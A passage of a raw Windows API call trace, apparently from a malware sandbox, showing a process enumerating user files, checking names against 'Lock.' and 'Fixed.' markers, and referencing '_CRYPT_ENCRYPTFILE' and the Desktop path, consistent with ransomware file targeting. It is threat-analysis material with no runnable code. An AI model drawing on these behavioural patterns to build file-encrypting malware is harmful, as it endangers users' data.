(in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadcb2240, ftCreationTime.dwHighDateTime=0x1d5e3be, ftLastAccessTime.dwLowDateTime=0x4cafb650, ftLastAccessTime.dwHighDateTime=0x1d5e6e9, ftLastWriteTime.dwLowDateTime=0x4cafb650, ftLastWriteTime.dwHighDateTime=0x1d5e6e9, nFileSizeHigh=0x0, nFileSizeLow=0x150f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="pGS8H.csv", cAlternateFileName="")) returned 1 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd42a9d0f, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd42a9d0f, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd42cff4e, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SafePC_ver1.0.dll", cAlternateFileName="SAFEPC~1.DLL")) returned 1 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd491219f, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd491219f, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4ab5b65, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x113f94, dwReserved0=0x0, dwReserved1=0x0, cFileName="sorry.form", cAlternateFileName="SORRY~1.FOR")) returned 1 [0125.648] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c3dc180, ftCreationTime.dwHighDateTime=0x1d5ecb8, ftLastAccessTime.dwLowDateTime=0x527ca840, ftLastAccessTime.dwHighDateTime=0x1d5eb2b, ftLastWriteTime.dwLowDateTime=0x527ca840, ftLastWriteTime.dwHighDateTime=0x1d5eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x6d22, dwReserved0=0x0, dwReserved1=0x0, cFileName="VstT.mp4", cAlternateFileName="")) returned 1 [0125.649] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af5270, ftCreationTime.dwHighDateTime=0x1d5e375, ftLastAccessTime.dwLowDateTime=0xf113eec0, ftLastAccessTime.dwHighDateTime=0x1d5e746, ftLastWriteTime.dwLowDateTime=0xf113eec0, ftLastWriteTime.dwHighDateTime=0x1d5e746, nFileSizeHigh=0x0, nFileSizeLow=0x5963, dwReserved0=0x0, dwReserved1=0x0, cFileName="WaYoUsnM2UCIentbe.swf", cAlternateFileName="WAYOUS~1.SWF")) returned 1 [0125.649] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x736f10c0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x1b53ae80, ftLastAccessTime.dwHighDateTime=0x1d5e1ef, ftLastWriteTime.dwLowDateTime=0x1b53ae80, ftLastWriteTime.dwHighDateTime=0x1d5e1ef, nFileSizeHigh=0x0, nFileSizeLow=0x96cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="wg77xQT1-Aj18nXa8K.swf", cAlternateFileName="WG77XQ~1.SWF")) returned 1 [0125.649] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437dfc90, ftCreationTime.dwHighDateTime=0x1d5e62b, ftLastAccessTime.dwLowDateTime=0xae61bd70, ftLastAccessTime.dwHighDateTime=0x1d5f126, ftLastWriteTime.dwLowDateTime=0xae61bd70, ftLastWriteTime.dwHighDateTime=0x1d5f126, nFileSizeHigh=0x0, nFileSizeLow=0x12cf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="WUNf8 S 6YDp2i.mp3", cAlternateFileName="WUNF8S~1.MP3")) returned 1 [0125.649] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef945870, ftCreationTime.dwHighDateTime=0x1d5f0ae, ftLastAccessTime.dwLowDateTime=0xecd00810, ftLastAccessTime.dwHighDateTime=0x1d5e518, ftLastWriteTime.dwLowDateTime=0xecd00810, ftLastWriteTime.dwHighDateTime=0x1d5e518, nFileSizeHigh=0x0, nFileSizeLow=0x9c99, dwReserved0=0x0, dwReserved1=0x0, cFileName="xTq6MCScdpqJ.odt", cAlternateFileName="XTQ6MC~1.ODT")) returned 1 [0125.649] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e0a13e0, ftCreationTime.dwHighDateTime=0x1d5ead3, ftLastAccessTime.dwLowDateTime=0x7c8450b0, ftLastAccessTime.dwHighDateTime=0x1d5edd9, ftLastWriteTime.dwLowDateTime=0x7c8450b0, ftLastWriteTime.dwHighDateTime=0x1d5edd9, nFileSizeHigh=0x0, nFileSizeLow=0x1893, dwReserved0=0x0, dwReserved1=0x0, cFileName="xwkMqwHw2FNJUh0.ods", cAlternateFileName="XWKMQW~1.ODS")) returned 1 [0125.649] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x450721d0, ftCreationTime.dwHighDateTime=0x1d5e721, ftLastAccessTime.dwLowDateTime=0x4c7382b0, ftLastAccessTime.dwHighDateTime=0x1d5ea41, ftLastWriteTime.dwLowDateTime=0x4c7382b0, ftLastWriteTime.dwHighDateTime=0x1d5ea41, nFileSizeHigh=0x0, nFileSizeLow=0xb494, dwReserved0=0x0, dwReserved1=0x0, cFileName="yW8EXq3.png", cAlternateFileName="")) returned 1 [0125.649] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ae99980, ftCreationTime.dwHighDateTime=0x1d5e2c2, ftLastAccessTime.dwLowDateTime=0xc281a560, ftLastAccessTime.dwHighDateTime=0x1d5f0de, ftLastWriteTime.dwLowDateTime=0xc281a560, ftLastWriteTime.dwHighDateTime=0x1d5f0de, nFileSizeHigh=0x0, nFileSizeLow=0xcdd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z3NyFrC6_WxtuHo-dMOg.ots", cAlternateFileName="Z3NYFR~1.OTS")) returned 1 [0125.649] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e2731f0, ftCreationTime.dwHighDateTime=0x1d5eec8, ftLastAccessTime.dwLowDateTime=0xe4508660, ftLastAccessTime.dwHighDateTime=0x1d5ed65, ftLastWriteTime.dwLowDateTime=0xe4508660, ftLastWriteTime.dwHighDateTime=0x1d5ed65, nFileSizeHigh=0x0, nFileSizeLow=0x21a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZsyajCuqv92xTr5whyk.bmp", cAlternateFileName="ZSYAJC~1.BMP")) returned 1 [0125.753] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc381a090, ftCreationTime.dwHighDateTime=0x1d5f02b, ftLastAccessTime.dwLowDateTime=0x892f8260, ftLastAccessTime.dwHighDateTime=0x1d5e697, ftLastWriteTime.dwLowDateTime=0x892f8260, ftLastWriteTime.dwHighDateTime=0x1d5e697, nFileSizeHigh=0x0, nFileSizeLow=0x80a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="_BsqZItCPNq0eBuQ.xls", cAlternateFileName="_BSQZI~1.XLS")) returned 1 [0125.753] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="踚@锴\x97\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0125.753] FindClose (in: hFindFile=0xa6e800 | out: hFindFile=0xa6e800) returned 1 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-2dSSUPd3c99IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2dSSUPd3c99IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dSSUPd3c99IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SSUPd3c99IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SUPd3c99IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UPd3c99IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pd3c99IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d3c99IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3c99IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c99IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="99IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IL5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ta.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0125.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e537b8 | out: hHeap=0x970000) returned 1 [0125.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0125.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0125.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0125.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f210 | out: hHeap=0x970000) returned 1 [0125.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f1f0 | out: hHeap=0x970000) returned 1 [0125.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f1f0 | out: hHeap=0x970000) returned 1 [0125.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f1f0 | out: hHeap=0x970000) returned 1 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-2dSSUPd3c99IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2dSSUPd3c99IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dSSUPd3c99IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SSUPd3c99IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SUPd3c99IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UPd3c99IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pd3c99IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d3c99IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3c99IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c99IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0125.755] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="99IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0125.756] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0125.756] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IL5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0125.756] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0125.756] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0125.756] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ta.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e537b8 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f200 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e537e8 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f270 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0125.756] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0125.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.756] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0125.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0125.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0125.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2a0 [0125.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f310 [0125.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0125.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0125.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0125.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0125.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0125.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f150 [0125.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f150 | out: hHeap=0x970000) returned 1 [0125.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0125.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0125.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0125.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f310 | out: hHeap=0x970000) returned 1 [0125.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f290 | out: hHeap=0x970000) returned 1 [0125.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e7f310 [0125.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.757] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0125.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0125.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f200 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f170 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0125.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0125.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0125.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0125.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0125.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f170 | out: hHeap=0x970000) returned 1 [0125.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e7f1f0 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f210 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0125.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f210 | out: hHeap=0x970000) returned 1 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e7f150 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53878 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f160 [0125.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0125.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f210 [0125.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f170 [0125.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f290 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0125.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f220 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ecd0 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7eba0 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0125.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0125.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0125.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0125.760] 